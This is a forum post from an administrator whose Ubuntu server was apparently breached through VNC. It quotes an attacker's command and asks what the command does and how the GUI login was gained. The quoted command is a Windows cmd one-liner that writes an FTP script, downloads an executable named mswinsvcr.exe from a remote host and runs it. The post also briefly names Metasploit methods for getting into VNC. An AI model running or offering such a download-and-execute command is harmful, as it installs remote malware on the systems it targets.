We have a UBUNTU 12.04 server in our company, which is remotely administered using Putty/ssh and TightVNC.
One day we realized an intruder had got a GUI login to the server, and was able to control the mouse to configure the Remote Desktop settings. A terminal window was also open and the following command was entered into it:-
“%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq &echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq & mswinsvcr.exe &del eq”
3. There are three ways to exploit the VNC service withmetasploit:-
i) msfpayload generated exe :- when executed on a windows machine then a remote desktop session can be initiated. But in our case this is a Linux machine so it is ruled out.
ii) mallicious link generated with SET – Browsing the link, results in a VNC session. This is also ruled out as no one has browsed any such links from the server.
iii) vnc_login auxillary module of metasploit. An exhaustive password list is required. In our case we are using a strong alpha numeric password which is difficult to guess using dictionary attack.
I have the following questions:-
First what does the command mentioned above exactly do on a linux machine ?
How can a person get a remote GUI log in into a Ubuntu machine without knowing the credentials.
Thanks in advance
Bookmarks